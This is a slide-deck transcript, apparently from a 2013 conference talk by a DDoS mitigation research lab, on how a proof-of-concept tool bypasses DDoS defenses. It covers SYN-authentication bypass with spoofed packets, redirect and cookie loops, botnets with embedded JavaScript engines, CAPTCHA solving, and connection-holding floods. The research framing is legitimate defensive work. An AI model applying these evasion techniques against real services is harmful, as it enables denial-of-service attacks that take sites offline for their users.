Tony Mui and Wai-Leng Lee - Kill 'em All — DDoS Protection Total ...
51
DDoS Protecion Total AnnihilationD DDoS Mitigation Lab A
Transcript of Tony Mui and Wai-Leng Lee - Kill 'em All — DDoS Protection Total ...
DDoS Protecion Total AnnihilationD
DDoS Mitigation Lab
A
DDoS Mitigation Lab
Independent academic R&D division of Nexusguard building next generation DDoSmitigation knowledge and collaborate with defense community.
Industry body formed to foster synergy among stakeholders to promote advancement in DDoSdefense knowledge.
DDoS Mitigation Lab
DDoS Mitigation Lab
DDoS Relevance, Attack Categories, Detection & Mitigation
Source Host Verification: Authentication Methods TCP SYN Auth HTTP Redirect Auth HTTP Cookie Auth JavaScript Auth CAPTCHA Auth
PoC Tool TCP Traffic Model HTTP Traffic Model
DDoS Mitigation Lab
Source: NTT Communications,“Successfully Combating DDoS Attacks”, Aug 2012
DDoS Mitigation Lab
Volumetric Semantic Blended
DDoS Mitigation Lab
ComplexitySimple Sophisticated
Vol
um
e
xxx Gbps+
xxx Mbps+
DDoS Mitigation Lab
Traffic Policing
Proactive Resource Release
Black- / Whitelisting
xxx Gbps+
xxx Mbps+
ComplexitySimple Sophisticated
Vol
um
e
DDoS Mitigation Lab
Rate Measurement(SNMP)
Baselining(Netflow)
Protocol Sanity (PCAP)
Application(SYSLOG)
Protocol Behavior(PCAP)
Big Data Analysis
ComplexitySimple Sophisticated
Vol
um
e
xxx Gbps+
xxx Mbps+
DDoS Mitigation Lab
c
DDoS Mitigation Lab
Traffic Pattern simulation, e.g. Like traffic behind Proxy
HTTP Header Simulation
Simulate Normal traffic Pattern and Behavior!!!!!
DDoS Mitigation Lab
Conn B and User-agent B Attack Traffic
Proxy
DDoS Mitigation Lab
HTTP header will change during the attack
For example, first HTTP request for HTTP Header “Accept”
First Request Second Request
Accept: */* Accept: image/gif, image/jpeg, imag,…..
DDoS Mitigation Lab
TCP option against Detection
Empower attack Power
DDoS Mitigation Lab
SYN ACK
SYN
ACK
Push ACK (HTTP Request e.g. GET, POST)
ACK
Push ACK
Conn
ectio
n Hold
Time Full Control every
TCP State!!!!
DDoS Mitigation Lab
SYN ACK
SYN
ACK
Push ACK (HTTP GET)
ACK
Fin ACK
Conns closed…
OLD-FASHIONED GET Flood
High CPU and constant no. of connsBut Still ALIVE!!!
DDoS Mitigation Lab
SYN ACK
SYN
ACK
Push ACK (HTTP Request)
ACK
Push ACK (HTTP Request)
Kill ‘EM ALL!!!!!!
ACK…
High Memory, High CPU and no. of conns increasing -------------------------HTTP 503 Service unavailable
DDoS Mitigation Lab
TCP SYN Auth
HTTP Redirect Auth
HTTP Cookie Auth
JavaScript Auth
CAPTCHA Auth
DDoS Mitigation Lab
SYN ACK
SYN
ACK
RST
SYN
SYN ACK
ACK
DDoS Mitigation Lab
SYN ACK
RST
SYN
SYN
SYN ACK
ACK
DDoS Mitigation Lab
RST (May be from Real host)
Spo
ofe
d S
rcIP
SYN
SYN ACK
TCP REST and TCP Out of Seq are SAME!!!!!!
DDoS Mitigation Lab
Handling a Real User access:
TCP REST TCP out of Seq
TCP Flag Total Length TCP Flag Total Length
SYN 60 SYN 60
SYN ACK 40 SYN ACK 40
ACK 40 RST 40
RST 40
Total 180 Bytes Total 140 Bytes
P.S. TCP SYN Packet size = Header length + Total Length
DDoS Mitigation Lab
SYN ACK
SYN
RST
Sam
e S
po
ofe
d a
re
al H
ost
IP a
s Sr
cIP
SYN
33% Attack traffic Bypassed
DDoS Mitigation Lab
The traditional SYN Flood is 40 bytes, missing TCP Option
How to simulate a real SYN traffic: In IP layer: Randomize TTL In TCP layer: Randomize Window size, Correct Option added, e.g.
Maximum Segment Size, etc.
48-60 bytes TCP SYN Flood attack is nightmare
DDoS Mitigation Lab
GET /index.html
HTTP 302 redir to /foo/index.html
GET /foo/index.html
HTTP 302 redir to /index.html
GET /index.html
DDoS Mitigation Lab
HTTP / 1.1 302 Found\r\n
Location: http: a.c.com\r\n
Loop the script, until “HTTP / 1.1 200 ok”
DDoS Mitigation Lab
GET /index.html
HTTP 302 redir to /index.html
HTTP 302 redir to /index.html
GET /index.html
GET /index.html
DDoS Mitigation Lab
Set-Cookie: AuthCode=d8e; expires=Mon, 23-Dec-2019 23:50:00 GMT; ……., etc
If Date and time of Expire is between hour or minutes, it is the ourREAUTH threshold!!!!!!!!
If you saw this in third HTTP redirect request
Set-Cookie:AuthCode=deleted;…….bad luck
DDoS Mitigation Lab
GET /index.html
HTTP 302 redir to /index.html [X-Header: foo=bar]
GET /index.html[X-Header: foo=bar]
GET /index.html[X-Header: foo=bar]
HTTP 302 redir to /index.html [X-Header: foo=bar]
GET /index.html
[X-Header: foo=bar]
DDoS Mitigation Lab
API, AJAX or XHR2 is used to deploy header token
Not all browser compatibility those Techniques
Existing Mitigation devices can not fully using those Techniques
Simulation the Traffic Flow BYPASS it!!!!
DDoS Mitigation Lab
GET /index.html
HTTP 302 redir to /index.html
GET /index.html
POST /auth.phpans=16
JS 7+nine=?
DDoS Mitigation Lab
JavaScript is client-side-program
Find the path “http://a.b.com/auth.js”, download and analyze it.
Challenge to embedded JavaScript in Botnet, guys using: Simulate the traffic flow Client Deployment Model Server Deployment Model
Kill ‘Em All is below 1M bytes!!!!!!
DDoS Mitigation Lab
Victim
Bot with JS Engine
Bot with JS Engine
Bot with JS Engine
ATTACK!!!Cmd: Attack!!!
C&C Server
……
..
DDoS Mitigation Lab
Victim
Tell me the ANS, plz~
Tell me the ANS, plz~
Tell me the ASN, plz~
ATTACK!!!Cmd: Attack!!!
C&C Server
……
..
Server Resolve auth.jse.g. Application Bundle
DDoS Mitigation Lab
GET /index.html
HTTP 302 redir to /index.html
GET /index.html
POST /auth.php
DDoS Mitigation Lab
JavaScript is client-side-program
Find the path “http://a.b.com/auth.bmp”, download and analyze it.
Challenge to embedded CAPTCHA Engine in Botnet, guys using: Simulate the traffic flow Client Deployment Model Server Deployment Model
DEFCON have FXXKING many CATPCHA engine!!!!
DDoS Mitigation Lab
DDoS Mitigation Lab
3 tries per authentication attempt (in practice more likely to success)
True TCP/IP behavior thru use of OS TCP/IP stack
Auth cookies persist during subsequent dialogues
JavaScript execution using embedded JS engine (lack of complete DOM an obstacle to full emulation)
DDoS Mitigation Lab
c
DDoS Mitigation Lab
DDoS Mitigation Lab
1. Converted to black-and-white for max contrast
2. 3x3 median filter applied for denoising
3. Word segmentation
4. Boundary recognition
5. Pixel difference computed against character map
DDoS Mitigation Lab
c
DDoS Mitigation Lab
Numb
er of
Con
necti
ons
Connection Hold TimeBefore 1st Request
Connection Idle TimeoutAfter Last Request
ConnectionsInterval
ConnectionsInterval
TCP Connection
TCP Connection
TCP Connection
DDoS Mitigation Lab
c
DDoS Mitigation Lab
Numb
er of
Req
uests
per C
onne
ction
RequestsInterval
RequestsInterval
RequestsInterval
TCP Connection
HTTP Connection
HTTP Connection
HTTP Connection
HTTP Connection
DDoS Mitigation Lab
DDoS Mitigation Lab
True TCP/IP behavior (RST, resend, etc.) thru use of true OS TCP/IP stack
Believable HTTP headers (User-Agent strings, etc.)
Embedded JavaScript engine
CAPTCHA solving capability
Randomized payload
Tunable post-authentication traffic model
DDoS Mitigation Lab
44 Page views44 regular traffic
DDoS Mitigation Lab
Against Devices Against Services
MeasureAttackTraffic
MeasureAttackTraffic
DDoS Mitigation Lab
Auth Bypass
Post-Auth
Testing results under specific conditions,valid as of Jul 13, 2013
ProactiveResource Release
DDoS Mitigation Lab
Auth Bypass Post-Auth
Testing results under specific conditions,valid as of Jul 13, 2013
ProactiveResource Release
